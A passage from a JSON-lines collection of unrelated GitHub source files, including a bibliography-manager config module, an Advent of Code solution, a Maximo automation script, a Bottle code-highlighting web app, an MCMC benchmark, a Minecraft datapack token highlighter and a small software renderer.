os.environ.get('XDG_DATA_HOME', os.path.join(HOME, '.local','share'))\n\nCONFIG_FILE_LEGACY = os.path.join(CONFIG_HOME, 'papersconfig.json')\nCONFIG_FILE = os.path.join(DATA_HOME, 'config.json')\nCONFIG_FILE_LOCAL = '.papers/config.json'\nDATA_DIR = os.path.join(DATA_HOME, 'papers')\nCACHE_DIR = os.path.join(CACHE_HOME, 'papers')\n\n\nclass Config:\n \"\"\"configuration class to specify system-wide collections and files-dir\n \"\"\"\n def __init__(self, file=None, data=DATA_DIR,\n bibtex=None, filesdir=None,\n keyformat=KEYFORMAT,\n nameformat=NAMEFORMAT,\n editor=None,\n gitdir=None, git=False, gitlfs=False, local=None, absolute_paths=None, backup_files=False):\n self.file = file\n self.local = local\n self.data = data\n self.filesdir = filesdir\n self.editor = editor\n self.bibtex = bibtex\n self.keyformat = keyformat\n self.nameformat = nameformat\n if absolute_paths is None:\n absolute_paths = False if local else True\n self.absolute_paths = absolute_paths\n self.gitdir = gitdir or data\n self.git = git\n self.gitlfs = gitlfs\n self.backup_files = backup_files\n\n\n @property\n def editor(self):\n return self._editor\n\n @editor.setter\n def editor(self, value):\n if value is not None:\n os.environ['EDITOR'] = value\n self._editor = value\n\n def collections(self):\n files = []\n for root, dirs, files in os.walk(os.path.dirname(self.bibtex)):\n break\n # return sorted(f[:-4] for f in files if f.endswith('.bib'))\n return sorted(f for f in files if f.endswith('.bib'))\n\n @property\n def root(self):\n if self.local and self.bibtex:\n return Path(self.bibtex).parent.resolve()\n else:\n return Path(os.path.sep)\n\n def gitcmd(self, cmd, check=True, **kw):\n return (sp.check_call if check else sp.call)(f\"git {cmd}\", shell=True, cwd=self.gitdir, **kw)\n\n\n def _relpath(self, p):\n if p is None: return p\n if not self.local:\n return str(Path(p).resolve()) # abspath\n\n # otherwise express path relative to bibtex (parent of config file)\n try:\n # logger.info(f\"rel path: (p)\", p)\n return str((self.root / p).relative_to(self.root))\n except Exception as error:\n print(error)\n logger.warn(f\"config :: can't save {p} as relative path to {self.root}\")\n return p\n\n def _abspath(self, p, root=None):\n if p is None: return p\n if not self.local:\n return str(Path(p).resolve()) # abspath\n p2 = str((Path(root).resolve() if root is not None else self.root) / p)\n return p2\n\n\n def save(self):\n json.dump({\n \"filesdir\": self._relpath(self.filesdir),\n \"bibtex\": self._relpath(self.bibtex),\n \"gitdir\": self._relpath(self.gitdir),\n \"editor\": self.editor,\n \"keyformat\": self.keyformat.todict(),\n \"nameformat\": self.nameformat.todict(),\n \"local\": self.local,\n \"absolute_paths\": self.absolute_paths,\n \"git\": self.git,\n \"gitlfs\": self.gitlfs,\n \"backup_files\": self.backup_files,\n }, open(self.file, 'w'), sort_keys=True, indent=2, separators=(',', ': '))\n\n\n @classmethod\n def load(cls, file):\n js = json.load(open(file))\n if 'nameformat' in js:\n js['nameformat'] = Format(**js.get('nameformat'))\n if 'keyformat' in js:\n js['keyformat'] = Format(**js.get('keyformat'))\n cfg = cls(file=file, **js)\n cfg._update_paths_to_absolute()\n return cfg\n\n\n def _update_paths_to_absolute(self):\n if self.file is None:\n logger.warn(\"_update_paths_to_absolute: only works if Config.file is defined\")\n return\n root = Path(self.file).parent.parent\n for field in ['bibtex', 'filesdir', 'gitdir']:\n setattr(self, field, self._abspath(getattr(self, field), root))\n\n\n def status(self, check_files=False, verbose=False):\n\n def _fmt_path(p):\n if self.local:\n return os.path.relpath(p, \".\")\n else:\n return p\n\n lines = []\n if self.file and os.path.exists(self.file):\n status = \"(local)\" if self.local else \"(global)\"\n else:\n status = bcolors.WARNING+\"(default, not installed)\"+bcolors.ENDC\n lines.append(bcolors.BOLD+f'papers configuration {status}'+bcolors.ENDC)\n lines.append(bcolors.BOLD+f'version {__version__}'+bcolors.ENDC)\n if verbose:\n lines.append('* configuration file: '+(_fmt_path(self.file) if self.file and os.path.exists(self.file) else bcolors.WARNING+'none'+bcolors.ENDC))\n lines.append('* cache directory: '+CACHE_DIR)\n lines.append('* absolute paths: '+str(self.absolute_paths))\n # lines.append('* app data directory: '+self.data)\n lines.append('* git-tracked: '+str(self.git))\n if self.git:\n lines.append('* git-lfs tracked: '+str(self.gitlfs))\n lines.append('* git directory : '+self.gitdir)\n lines.append('* editor: '+str(self.editor))\n\n if self.filesdir is None:\n status = bcolors.WARNING+' (unset)'+bcolors.ENDC\n elif not os.path.exists(self.filesdir):\n status = bcolors.WARNING+' (missing)'+bcolors.ENDC\n elif not os.listdir(self.filesdir):\n status = bcolors.WARNING+' (empty)'+bcolors.ENDC\n elif check_files:\n file_count, folder_size = check_filesdir(self.filesdir)\n status = bcolors.OKBLUE+\" ({} files, {:.1f} MB)\".format(file_count, folder_size/(1024*1024.0))+bcolors.ENDC\n else:\n status = ''\n\n lines.append(f'* files directory: {_fmt_path(self.filesdir) if self.filesdir else self.filesdir}'+status)\n\n if self.bibtex is None:\n status = bcolors.WARNING+' (unset)'+bcolors.ENDC\n elif not os.path.exists(self.bibtex):\n status = bcolors.WARNING+' (missing)'+bcolors.ENDC\n elif check_files:\n try:\n bibtexstring = open(self.bibtex).read()\n db = bibtexparser.loads(bibtexstring)\n if len(db.entries):\n status = bcolors.OKBLUE+' ({} entries)'.format(len(db.entries))+bcolors.ENDC\n else:\n status = bcolors.WARNING+' (empty)'+bcolors.ENDC\n except:\n status = bcolors.FAIL+' (corrupted)'+bcolors.ENDC\n elif os.path.getsize(self.bibtex) == 0:\n status = bcolors.WARNING+' (empty)'+bcolors.ENDC\n else:\n status = ''\n lines.append(f'* bibtex: {_fmt_path(self.bibtex) if self.bibtex else self.bibtex}'+status)\n\n # if verbose:\n # collections = self.collections()\n # status = bcolors.WARNING+' none'+bcolors.ENDC if not collections else ''\n # lines.append('* other collections:'+status)\n # for i, nm in enumerate(collections):\n # if i > 10:\n # lines.append(' '+'({} more collections...)'.format(len(collections)-10))\n # break\n # status = ' (*)' if nm == self.collection else ''\n # lines.append(' '+nm+status)\n\n\n\n return '\\n'.join(lines)\n\n\ndef _init_cache():\n if not os.path.exists(CACHE_DIR):\n logger.info('make cache directory for DOI requests: '+CACHE_DIR)\n os.makedirs(CACHE_DIR)\n\n_init_cache()\n\ndef cached(file, hashed_key=False):\n\n file = os.path.join(CACHE_DIR, file)\n\n def decorator(fun):\n if os.path.exists(file):\n cache = json.load(open(file))\n else:\n cache = {}\n def decorated(doi):\n if hashed_key: # use hashed parameter as key (for full text query)\n key = hashlib.sha256(doi.encode('utf-8')).hexdigest()[:6]\n else:\n key = doi\n if key in cache:\n logger.debug('load from cache: '+repr((file, key)))\n return cache[key]\n else:\n res = cache[key] = fun(doi)\n if not DRYRUN:\n json.dump(cache, open(file,'w'))\n return res\n return decorated\n return decorator","repo_name":"perrette/papers","sub_path":"papers/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":9052,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"77"} +{"seq_id":"42725097187","text":"import numpy as np, re, math\r\n\r\nwith open('inputday7.txt') as f:\r\n input = f.readline()\r\n \r\ncrab_pos = np.array([int(i) for i in re.findall(r'\\d+', input)])\r\n\r\ndef fuel_cost(crab_pos, align):\r\n fuel = 0\r\n for i in range(len(crab_pos)):\r\n fuel = fuel + abs(crab_pos[i] - align)\r\n return fuel\r\n\r\ndef fuel_cost2(crab_pos, align):\r\n fuel = 0\r\n for i in range(len(crab_pos)):\r\n for j in range(abs(crab_pos[i] - align) + 1):\r\n fuel = fuel + j\r\n return fuel\r\n\r\n#PART 1\r\n\r\nalign = int(np.median(crab_pos))\r\n\r\nmin_fuel = fuel_cost(crab_pos, align)\r\n\r\nprint(min_fuel)\r\n\r\n#PART 2\r\n\r\nfuel_list = []\r\nfor i in range(np.amax(crab_pos)):\r\n align = i\r\n fuel_list.append(fuel_cost2(crab_pos, align))\r\n\r\nfuel_list = np.array(fuel_list)\r\nmin_fuel = np.amin(fuel_list)\r\n\r\nprint(min_fuel)\r\n","repo_name":"baitware/AdventofCode","sub_path":"2021/Day 7/Day7.py","file_name":"Day7.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9907535703","text":"# AUTOSCRIPT NAME: CG_MOVEASSET\n# CREATEDDATE: 2017-04-06 05:42:33\n# CREATEDBY: U03V\n# CHANGEDATE: 2017-04-18 06:36:30\n# CHANGEBY: U144\n# SCRIPTLANGUAGE: jython\n# STATUS: Draft\n\nfrom psdi.app.location import Location\nfrom psdi.app.location import LocationRemote\nfrom psdi.app.location import LocationSetRemote\nfrom psdi.mbo import SqlFormat\n\ndef setError():\n global errorkey,errorgroup,params\n errorkey='invalidStatusForThisMove'\n errorgroup='asset'\nif interactive :\n prevloc=mbo.getString(\"LOCATION\")\n prevloc1=mbo.getMboValue(\"LOCATION\").getPreviousValue().asString()\n if prevloc!=prevloc1:\n loc=mbo.getMboSet(\"NEWLOCATION\").getMbo(0)\n if ( loc != \"\" or loc is not None ) and mbo.getString(\"SITEID\") == \"MS\":\n assetnum=mbo.getString(\"ASSETNUM\")\n sqf = SqlFormat(\"location=:1 and siteid=:2\")\n sqf.setObject(1, \"LOCATIONS\", \"LOCATION\", mbo.getMboValue(\"LOCATION\").getPreviousValue().asString())\n sqf.setObject(2, \"LOCATIONS\", \"SITEID\", mbo.getString(\"SITEID\"))\n fromLoc=mbo.getMboSet(\"$newlocation\", \"LOCATIONS\", sqf.format()).getMbo(0)\n \n fromlocation=fromLoc.getString(\"LOCATION\")\n\n fromlocationtype=fromLoc.getString(\"TYPE\")\n loclocation=loc.getString(\"LOCATION\")\n\n loclocationtype1=loc.getString(\"TYPE\")\n \n\n sqlfmt = SqlFormat(\"siteid=:1 and fromlocationtype=:2 and tolocationtype=:3 and assetstatus=:4\")\n sqlfmt.setObject(1, \"CG_ASSETMOVERESTRICTION\", \"SITEID\", mbo.getString(\"SITEID\"))\n sqlfmt.setObject(2, \"CG_ASSETMOVERESTRICTION\", \"FROMLOCATIONTYPE\", fromLoc.getString(\"TYPE\"))\n sqlfmt.setObject(3, \"CG_ASSETMOVERESTRICTION\", \"TOLOCATIONTYPE\", loc.getString(\"TYPE\"))\n sqlfmt.setObject(4, \"CG_ASSETMOVERESTRICTION\", \"ASSETSTATUS\", mbo.getString(\"STATUS\"))\n\n \n mboSetMoveRestriction = mbo.getMboSet(\"$moverestriction\", \"CG_ASSETMOVERESTRICTION\", sqlfmt.format())\n if mboSetMoveRestriction .count() > 0 :\n setError()","repo_name":"git786hub/Dynatrace_python","sub_path":"src/CG_MOVEASSET.py","file_name":"CG_MOVEASSET.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16309297122","text":"import time\nfrom __init__ import *\n\ndef main():\n ark = Arknights()\n farming = False\n start = None\n while(1):\n type, reg = ark.detect_screen(\"seaborn\")\n if(type != None):\n if(not farming):\n print(type, reg)\n if(type in [\"start\", \"mission_start\", \"finish\"]):\n farming = False\n ark.touch(reg)\n if(type in [\"farming\"]):\n farming = True\n ark.sleep(1)\n ark.sleep(1)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"eruchii/ArkModule","sub_path":"test_auto_detect.py","file_name":"test_auto_detect.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24466582311","text":"import os\nfrom bottle import get,post,request,template,static_file,run\nimport pygmentsColorer\nimport fileoperation\nimport compileandrun\n\nlanglist = pygmentsColorer.getLexers()\nstylelist = pygmentsColorer.getStyles()\n\n@get('/')\ndef getindex():\n\treturn template('index', langtypes=langlist,styles=stylelist);\n\n@get('/filelist.json')\ndef getfilelist():\n\tcodefilelist = fileoperation.getFilelist()\n\tcodefilelist.sort()\n\tcodelistJson={}\n\tindex = 0\n\tfor codefile in codefilelist:\n\t\tcodelistJson[index]=codefile\n\t\tindex += 1\n\treturn codelistJson\n@post('/getfilecontent')\ndef getFilecontent():\n\treturn pygmentsColorer.getColorfilecontent(request.forms.get('codefilename'))\n\n@post('/')\ndef postindex():\n\tlang=request.forms.get('lang')\n\tstyle=request.forms.get('style')\n\tcode = \"\"\n\tif request.files:\n\t\tcode = request.files.codefile.file.read()\n\t\tif request.forms.get('save'):\n\t\t\tfilename = request.files.codefile.filename\n\t\t\tfileoperation.saveFile(filename, code)\n\t\trequest.files.codefile.file.write(\"\")\n\telse:\n\t\tcode=request.forms.get('code')\n\treturn pygmentsColorer.getColorCode(code, lang, style)\n\n@post('/compilesourcecode')\ndef compileSourceCode():\n\tsourcecode=request.forms.get('sourcecode')\n\tlangtype = request.forms.get('langtype')\n\treturn compileandrun.compilerunCode(sourcecode, langtype)\n\n@get('/static/')\ndef server_static(filename):\n\treturn static_file(filename,root=os.getcwd()+'/static')\n\n# debug=True\n# In debug mode, Bottle is much more verbose and provides helpful debugging information\n# whenever an error occurs. It also disables optimisations that might get in your way\n# Here is an incomplete list of things that change in debug mode:\n# The default error page shows a traceback.\n# Templates are not cached\n# Plugins are applied immediately\n#\n# Just make sure to not use the debug mode on a production server.\n#\n# Bottle runs on the built-in wsgiref WSGIServer by default. This\n# non-threading HTTP server is perfectly fine for development and\n# early production, but may become a performance bottleneck when \n# server load increases.\n# There are three ways to eliminate this bottleneck:\n#\tUse a multi-threaded or asynchronous HTTP server\n#\tSpread the load between multiple Bottle instances.\n#\tDo both.\n#\n# reloader=True\n# During development, you have to restart the server \n# a lot to test your recent changes. The auto reloader\n# can do this for you. Every time you edit a module file,\n# the reloader restarts the server process and loads the\n# newest version of your code.\n#\nrun(host='127.0.0.1', port=8080, debug=True, reloader=True)\n","repo_name":"kitelife/colorfulCode","sub_path":"cc.py","file_name":"cc.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"9633895413","text":"# @file:\tpyo3async_test.py\n# @author:\tJacob Xie\n# @date:\t2023/09/08 23:53:40 Friday\n# @brief:\n\nimport logging\nimport asyncio\n\nfrom pyo3async import rust_sleep, rust_log, PA, rust_sleep_print\n\nprint(\"pyo3async test case\")\n\nFORMAT = \"%(levelname)s %(name)s %(asctime)-15s %(filename)s:%(lineno)d %(message)s\"\nlogging.basicConfig(\n level=logging.INFO,\n format=FORMAT,\n handlers=[\n #\n logging.FileHandler(\"debug.log\"),\n logging.StreamHandler(),\n ],\n)\n\nrust_log()\n\n\nasync def py_sleep():\n # must be wrapped in a py async env\n await rust_sleep()\n\n\nasyncio.run(py_sleep())\n\n\npa = PA(1, \"Jacob\", [\"a\", \"b\", \"c\"])\n\nprint(pa.to_json())\n\nprint(pa.key)\nprint(pa.name)\nprint(pa.props)\n\npa.name = \"JacobX\"\nprint(pa.name)\n\npa.props = pa.props + [\"tada\"]\nprint(pa.props)\n\n\nasync def py_sleep_print(secs: int, pa: PA) -> PA:\n return await rust_sleep_print(secs, pa)\n\n\nasync_pa = asyncio.run(py_sleep_print(5, pa))\n\nprint(async_pa.to_json())\n","repo_name":"Jacobbishopxy/jottings","sub_path":"pyo3async/tests/pyo3async_test.py","file_name":"pyo3async_test.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"12874005722","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom . import views\n\napp_name = 'api'\nurlpatterns = [\n url(r'^$', views.api_root),\n url(r'^dictionaries/$', views.DictionaryListView.as_view(), name='dictionary-list'),\n url(r'^dictionaries/(?P[0-9]+)/$', views.DictionaryDetailView.as_view(), name='dictionary-detail'),\n url(r'^chapters/(?P[0-9]+)/$', views.ChapterDetailView.as_view(), name='chapter-detail'),\n]\n","repo_name":"danielwii/benkyo","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8930874603","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport emcee\nimport sys\nsys.path.append('./src')\nfrom functions import eigprob_solver as EGS\nfrom schwimmbad import MPIPool\nfrom mpi4py import MPI\n\n\nNDIM = 2\nNWALKERS = 24\nMAXITER = 4\nMATSIZE = 2048\nSOLVERS = np.array(['numpy', 'scipy', 'scipy_sparse']) #, 'tensorflow'])\nGLOBAL_COUNTER = 0\n\n\n\ndef log_likelihood(theta, x, y, yerr):\n eigSolver = EGS(solver_name=SOLVERS[0])\n m, b = theta\n model = m * x + b\n sigma2 = yerr ** 2 + model ** 2 * np.exp(2 * np.log(f_true))\n eigSolver.mat = eigSolver.build_sparse_matrix(MATSIZE)\n eigSolver.solver(eigSolver.mat)\n # GLOBAL_COUNTER = GLOBAL_COUNTER + 1\n return -0.5 * np.sum((y - model) ** 2 / sigma2 + np.log(sigma2))\n\n\ndef log_prior(theta):\n m, b = theta\n if -5.0 < m < 0.5 and 0.0 < b < 10.0:\n return 0.0\n return -np.inf\n\n\ndef log_probability(theta, x, y, yerr):\n lp = log_prior(theta)\n if not np.isfinite(lp):\n return -np.inf\n return lp + log_likelihood(theta, x, y, yerr)\n\n\n\nif __name__ == \"__main__\":\n np.random.seed(123)\n GLOBAL_COUNTER = 0\n\n # Choose the \"true\" parameters.\n m_true = -0.9594\n b_true = 4.294\n f_true = 0.534\n\n # Generate some synthetic data from the model.\n N = 50\n x = np.sort(10 * np.random.rand(N))\n yerr = 0.1 + 0.5 * np.random.rand(N)\n y = m_true * x + b_true\n y += np.abs(y * f_true) * np.random.randn(N)\n y += yerr * np.random.randn(N)\n\n x0 = np.linspace(0, 10, 500)\n\n\n theta_init = np.array([m_true, b_true]).reshape(1, NDIM)\n pos = theta_init + 1e-4 * np.random.randn(NWALKERS, NDIM)\n\n with MPIPool() as pool:\n GLOBAL_COUNTER = 0\n comm = MPI.COMM_WORLD\n mpirank = comm.Get_rank()\n print(f\"Process {mpirank:3d}: Running MPI\")\n if not pool.is_master():\n pool.wait()\n sys.exit(0)\n\n sampler = emcee.EnsembleSampler(NWALKERS, NDIM,\n log_probability,\n args=(x, y, yerr),\n pool=pool)\n sampler.run_mcmc(pos, MAXITER, progress=True)\n print(f\"Total count = {GLOBAL_COUNTER}\")\n\n","repo_name":"srijaniiserprinceton/test_eigprob","sub_path":"src/mcmc.py","file_name":"mcmc.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27894936129","text":"import json\nimport os\nimport sys\nfrom dataclasses import dataclass\nfrom lib2to3.pgen2 import token\nfrom types import TracebackType\nfrom typing import Any, Dict, List\n\nimport yaml\nfrom beet import Context, Function, run_beet\nfrom mecha import (CompilationError, CompilationUnit, DiagnosticError,\n DiagnosticErrorSummary, Mecha, Parser)\nfrom TokenHighlighter import TokenHighlighter\nfrom tokenstream import TokenStream\n\n\n@dataclass\nclass TokenExtractor:\n parser: Parser\n ctx: Context\n\n def __call__(self, stream: TokenStream) -> Any:\n node = self.parser(stream)\n tokens = []\n for t in stream.tokens:\n tokens.append({'type': t.type, 'value': t.value, 'start': t.location, 'end': t.end_location})\n \n self.ctx.meta.setdefault(\"tokens\", []).extend(tokens)\n \n return node\n\n\n\ndef setupTokens(ctx: Context, function: str): \n mc = ctx.inject(Mecha)\n # mc.spec.parsers[\"root\"] = TokenExtractor(mc.spec.parsers[\"root\"], ctx)\n # mc.spec.parsers[\"nested_root\"] = TokenExtractor(mc.spec.parsers[\"nested_root\"], ctx)\n \n \n mc.database.current = Function(function)\n \n mc.database[mc.database.current] = CompilationUnit(resource_location=\"dummy:foo\")\n # mc.parse(mc.database.current)\n highlighter = TokenHighlighter()\n highlighter(mc.parse(mc.database.current))\n \n ctx.meta[\"tokens\"] = highlighter.tokens\n \ndef sortByTokenLength(t):\n return t['end'][0] - t['start'][0]\n \ndef grabTokens(function: str, configPath: str):\n # if(sys.argv[2] != None):\n # if(sys.argv[2].endswith('json')):\n # config = json.load(open(sys.argv[2]))\n # elif(sys.argv[2].endswith('yaml')):\n # config = yaml.load(open(sys.argv[2]), Loader=yaml.FullLoader)\n \n # os.chdir(os.path.dirname(sys.argv[2]))\n \n config = {}\n \n if(configPath != ''):\n text = open(configPath, 'r').read()\n config = json.loads(text) if configPath.endswith('json') else yaml.load(text, Loader=yaml.FullLoader)\n if('output' in config):\n config['output'] = None\n os.chdir(os.path.dirname(configPath))\n try:\n with run_beet(config) as ctx:\n setupTokens(ctx, function)\n tokens: List[Dict] = ctx.meta[\"tokens\"] \n # tokens.sort(key=sortByTokenLength, reverse=True)\n return {'status': 'ok', 'tokens': tokens}\n except DiagnosticErrorSummary as e:\n error = ''\n for i in range(len(e.diagnostics.exceptions)):\n execption = e.diagnostics.exceptions[i]\n error += f'-------\\n{type(e)} {i}:\\n{execption.message}'\n \n return {'status': 'error', 'message': error}\n except SyntaxError as e:\n return {'status': 'error', 'message': f'-------\\n{type(e)}:\\n{str(e)}'}\n except ValueError as e:\n return {'status': 'error', 'message': f'-------\\n{type(e)}:\\n{str(e)}'}\n except Exception as e:\n return {'status': 'error', 'message': f'-------\\n{type(e)}:\\n{str(e)}'}\n\nfor line in sys.stdin:\n request = json.loads(line)\n \n if request[\"mode\"] == 'tokens':\n function = request[\"text\"]\n config = request[\"config\"] if 'config' in request else ''\n # sys.stdin.flush()\n print(\"data: \" + json.dumps(grabTokens(function, config)))\n # print(function, config)\n # print(line)\n sys.stdout.flush()","repo_name":"TheNuclearNexus/BeetSemantics","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"1319484744","text":"# Flask app to serve the model\nimport os\nimport sqlite3\nfrom argparse import ArgumentParser\n\n\"\"\"\nUpload to server with (overwrite the database on the server):\ncurl -X POST -F \"file=@database.db\" http://45.76.11.163:8000/upload_database\n\"\"\"\n\nDATABASE = './database.db'\n\ndef parse_args():\n parser = ArgumentParser()\n parser.add_argument('--video_dir', default='./public/Results-01-28', help='directory of videos')\n return parser.parse_args()\n\n# return list of mp4 files in the directory\ndef get_video_list(video_dir):\n video_list = []\n for file in os.listdir(video_dir):\n if file.endswith('_action.mp4'):\n video_list.append(file)\n return video_list\n\n\nif __name__ == '__main__':\n # Insert all videos into the database with comment 'Unfinished'\n args = parse_args()\n video_dir = args.video_dir\n video_dir_basename = os.path.basename(video_dir)\n db_path = DATABASE\n db = sqlite3.connect(db_path)\n db.cursor().execute(f\"CREATE TABLE '{video_dir_basename}' (video VARCHAR(255), comment VARCHAR(255))\")\n for video in get_video_list(video_dir):\n db.cursor().execute(f\"INSERT INTO '{video_dir_basename}' (video, comment) VALUES (?, ?)\", (video, 'Unfinished'))\n db.commit()","repo_name":"zhifanzhu/web_video_table","sub_path":"tools/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11624468509","text":"# Randy Venegas 18341\n# Graficas por Computadora \n\nimport struct\nimport random\nfrom obj import Obj, Texture\nfrom collections import namedtuple\nfrom numpy import matrix, cos, sin, tan\n\nV2 = namedtuple('Point2', ['x', 'y'])\nV3 = namedtuple('Point3', ['x', 'y', 'z'])\n\ndef char(input):\n\treturn struct.pack('=c', input.encode('ascii'))\n\ndef word(input):\n\treturn struct.pack('=h', input)\n\ndef dword(input):\n\treturn struct.pack('=l', input)\n\ndef glColor(r, g, b):\n\treturn bytes([b, g, r])\n\ndef cross(v1, v2):\n\treturn V3(\n\t\tv1.y * v2.z - v1.z * v2.y,\n\t\tv1.z * v2.x - v1.x * v2.z,\n\t\tv1.x * v2.y - v1.y * v2.x,\n\t)\n\ndef bbox(*vertices):\n\txs = [ vertex.x for vertex in vertices]\n\tys = [ vertex.y for vertex in vertices]\n\n\txs.sort()\n\tys.sort()\n\n\n\txmin = int(xs[0])\n\tymin = int(ys[0])\n\txmax = int(xs[-1])\n\tymax = int(ys[-1])\n\n\treturn xmin, xmax, ymin, ymax\n\ndef barycentric(A, B, C, P):\n\tcx, cy, cz = cross(\n\t\tV3(C.x - A.x, B.x - A.x, A.x - P.x), \n\t\tV3(C.y - A.y, B.y - A.y, A.y - P.y)\n\t)\n\n\tif abs(cz) < 1:\n\t\treturn -1, -1, -1\n\n\tu = cx/cz\n\tv = cy/cz\n\tw = 1 - (u + v)\n\n\treturn V3(w, v, u)\n\n\ndef sum(v0, v1):\n\treturn V3(v0.x + v1.x, v0.y + v1.y, v0.z + v1.z)\n\ndef sub(v0, v1):\n\treturn V3(v0.x - v1.x, v0.y - v1.y, v0.z - v1.z)\n\ndef mul(v0, k):\n\treturn V3(v0.x * k, v0.y * k, v0.z *k)\n\ndef dot(v0, v1):\n\treturn v0.x * v1.x + v0.y * v1.y + v0.z * v1.z\n\ndef cross(v0, v1):\n\treturn V3(\n\t\tv0.y * v1.z - v0.z * v1.y,\n\t\tv0.z * v1.x - v0.x * v1.z,\n\t\tv0.x * v1.y - v0.y * v1.x,\n\t)\n\ndef length(v0):\n\treturn (v0.x**2 + v0.y**2 + v0.z**2)**0.5\n\ndef norm(v0):\n\n\tv0length = length(v0)\n\n\tif not v0length:\n\t\treturn V3(0, 0, 0)\n\n\treturn V3(v0.x/v0length, v0.y/v0length, v0.z/v0length)\n\nBLACK = glColor(0, 0, 0)\nWHITE = glColor(255, 255, 255)\n\n\nclass Render(object):\n\tdef glInit(self, width, height):\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.color = glColor(255, 255, 255)\n\t\tself.clearColor = glColor(0, 0, 0)\n\t\tself.light = V3(0,0,1)\n\t\tself.activeVertexArray = []\n\t\tself.glClear()\n\n\t\tself.zbuffer = [\n\t\t\t[-float('inf') for x in range(self.width)]\n\t\t\tfor y in range(self.height)\n\t\t]\n\n\tdef glColorPoint(self, r, g, b):\n\t\tself.color = glColor(round(r * 255), round(g * 255), round(b * 255))\n\n\tdef glCreateWindow(self, width = 640, height = 480):\n\t\tself.width = width\n\t\tself.height = height\n\n\tdef glClear(self):\n\t\tself.framebuffer = [\n\t\t\t[glColor(0,150,50) for i in range(self.width)]\n\t\t\tfor j in range(self.height)\n\t\t]\n\n\t\tself.zbuffer = [\n\t\t\t[-float('inf') for x in range(self.width)]\n\t\t\tfor y in range(self.height)\n\t\t]\n\n\tdef glClearColor(self, r, g, b):\n\t\tself.clearColor = glColor(round(r * 255), round(g * 255), round(b * 255))\n\t\tself.framebuffer = [\n [clearColor for x in range(self.width)] for y in range(self.height)\n ]\n\n\tdef pixel(self, x, y, color):\n\t\ttry:\n\t\t\tself.framebuffer[y%self.height][x%self.width] = color\n\t\texcept:\n\t\t\tpass\n\n\tdef glFinish(self, filename):\n\t\tf = open(filename, 'bw')\n\n\t\tf.write(char('B'))\n\t\tf.write(char('M'))\n\t\tf.write(dword(54 + self.width * self.height * 3))\n\t\tf.write(dword(0))\n\t\tf.write(dword(54))\n\n\t\tf.write(dword(40))\n\t\tf.write(dword(self.width))\n\t\tf.write(dword(self.height))\n\t\tf.write(word(1))\n\t\tf.write(word(24))\n\t\tf.write(dword(0))\n\t\tf.write(dword(self.width * self.height * 3))\n\t\tf.write(dword(0))\n\t\tf.write(dword(0))\n\t\tf.write(dword(0))\n\t\tf.write(dword(0))\n\n\t\tfor x in range(self.height):\n\t\t\tfor y in range(self.width):\n\t\t\t\tf.write(self.framebuffer[x][y])\n\n\t\tf.close()\n\n\tdef glLine(self, A, B, color):\n\n\t\tx1 = round(A.x)\n\t\ty1 = round(A.y)\n\t\tx2 = round(B.x)\n\t\ty2 = round(B.y)\n\n\t\tdy = abs(y2 - y1)\n\t\tdx = abs(x2 - x1)\n\t\tsteep = dy > dx\n\n\t\tif steep:\n\t\t x1, y1 = y1, x1\n\t\t x2, y2 = y2, x2\n\n\t\tif x1 > x2:\n\t\t x1, x2 = x2, x1\n\t\t y1, y2 = y2, y1\n\n\t\tdy = abs(y2 - y1)\n\t\tdx = abs(x2 - x1)\n\n\t\toffset = 0\n\t\tthreshold = dx\n\n\t\ty = y1\n\t\tfor x in range(x1, x2 + 1):\n\t\t if steep:\n\t\t self.pixel(y, x, color)\n\t\t else:\n\t\t self.pixel(x, y, color)\n\t\t \n\t\t offset += dy * 2\n\t\t if offset >= threshold:\n\t\t y += 1 if y1 < y2 else -1\n\t\t threshold += dx * 2\n\n\tdef transform(self, vertex):\n\t\taugmented_vertex = [\n\t\t\tvertex.x,\n\t\t\tvertex.y,\n\t\t\tvertex.z,\n\t\t\t1\n\t\t]\n\t\ttranformed_vertex = self.Viewport @ self.Projection @ self.View @ self.Model @ augmented_vertex\n\n\t\ttranformed_vertex = tranformed_vertex.tolist()[0]\n\n\t\ttranformed_vertex = [\n\t\t\t(tranformed_vertex[0]/tranformed_vertex[3]),\n\t\t\t(tranformed_vertex[1]/tranformed_vertex[3]),\n\t\t\t(tranformed_vertex[2]/tranformed_vertex[3])\n\t\t]\n\t\treturn V3(*tranformed_vertex)\n\t \n\n\tdef drawArrays(self, polygonType):\n\t\tif polygonType == 'TRIANGLE':\n\t\t\ttry:\n\t\t\t\tcont = 1\n\t\t\t\twhile True:\n\t\t\t\t\tself.triangle()\n\t\t\t\t\tprint(\"triangulo: \",cont)\n\t\t\t\t\tcont += 1\n\t\t\texcept StopIteration:\n\t\t\t\tprint(\"done\")\n\t\telif polygonType == 'WIREFRAME':\n\t\t\ttry:\n\t\t\t\tcont = 1\n\t\t\t\twhile 